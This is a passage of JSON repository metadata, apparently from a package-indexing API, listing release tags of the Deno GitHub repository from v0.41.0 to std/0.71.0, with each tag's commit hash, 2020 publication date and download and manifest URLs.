noland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/